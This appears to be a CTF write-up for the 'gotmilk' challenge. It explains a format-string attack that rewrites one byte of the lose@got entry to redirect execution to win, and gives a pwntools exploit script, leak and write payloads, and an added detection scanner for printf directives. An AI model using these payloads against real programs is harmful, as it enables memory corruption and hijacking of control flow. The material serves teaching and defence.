Change the least significant byte of the address stored at lose@got so that it matches the least significant byte of win's address.

If you check the libmylib.so file, you will see that the two addresses differ only in the last byte.

The other way to verify it is to leak the address stored at lose@got a bunch of times using `<lose_got_addr>%7$s`; you will also see that the last byte remains constant.

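```python
#!/usr/bin/env python2

from pwn import *

# Load the binary to resolve its GOT entries, then connect to the challenge service
elf = ELF('./gotmilk')
p = remote('pwn.chal.csaw.io', 1004)

# Address of lose's GOT slot in the gotmilk binary
lose_got = elf.got['lose']

log.info('lose@got: ' + hex(lose_got))

# The 4 address bytes go first so that positional argument 7 refers to them
payload = p32(lose_got)
# 4 address bytes + 133 padding characters = 137 = 0x89 characters printed, so %7$hhn
# writes 0x89 to the last byte of lose@got, effectively changing it to win's address from libmylib.so
payload += '%133c%7$hhn'

p.sendlineafter('? ', payload)
```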
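
A defender-side view of the two payloads above, as an added example that is not part of the original writeup: a small Python 3 scanner that parses printf conversion specifications in untrusted input and flags the `%n`-family writes and positional reads this technique depends on. The function names, verdict labels and sample strings are constructed for illustration; `AAAA` stands in for the four address bytes.

```python
import re

# One printf conversion: %[N$][flags][width][.prec][length]conv, or a literal "%%"
SPEC = re.compile(
    r"%(?:(?P<pos>\d+)\$)?(?P<flags>[-+ #0']*)(?P<width>\d+|\*)?"
    r"(?:\.(?P<prec>\d+|\*))?(?P<length>hh|h|ll|l|j|z|t|L)?"
    r"(?P<conv>[diouxXeEfFgGaAcspn%])"
)

def scan(data):
    """Return (kind, directive, detail) findings for printf directives in input."""
    findings = []
    for m in SPEC.finditer(data):
        conv = m.group("conv")
        if conv == "%":
            continue  # "%%" prints a literal percent sign and consumes no argument
        if conv == "n":
            # %n stores the count of characters printed so far; the length
            # modifier ("hh" = one byte) selects how much memory is written.
            findings.append(("write", m.group(0), m.group("length") or ""))
        elif m.group("pos"):
            # N$ selects an arbitrary argument slot, as in the %7$s leak
            findings.append(("positional-read", m.group(0), int(m.group("pos"))))
        elif conv in "sp":
            findings.append(("read", m.group(0), None))
    return findings

def verdict(data):
    """block: memory write directive; review: read directive; allow: neither."""
    kinds = {kind for kind, _, _ in scan(data)}
    if "write" in kinds:
        return "block"
    return "review" if kinds else "allow"

if __name__ == "__main__":
    samples = [                 # constructed inputs, not captured traffic
        "AAAA%133c%7$hhn",      # shape of the write payload in the script above
        "AAAA%7$s",             # shape of the leak payload
        "100%% milk",           # escaped percent sign
        "100% sure",            # benign text that still parses as "% s"
    ]
    for s in samples:
        print(verdict(s), repr(s), scan(s))
```

Benign text such as `100% sure` lands in `review` rather than `allow` because `% s` is a syntactically valid conversion; the reliable fix remains passing user input as an argument to a constant format string, with a scanner like this as a logging or triage aid.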


Original writeup (https://syedfarazabrar.com/).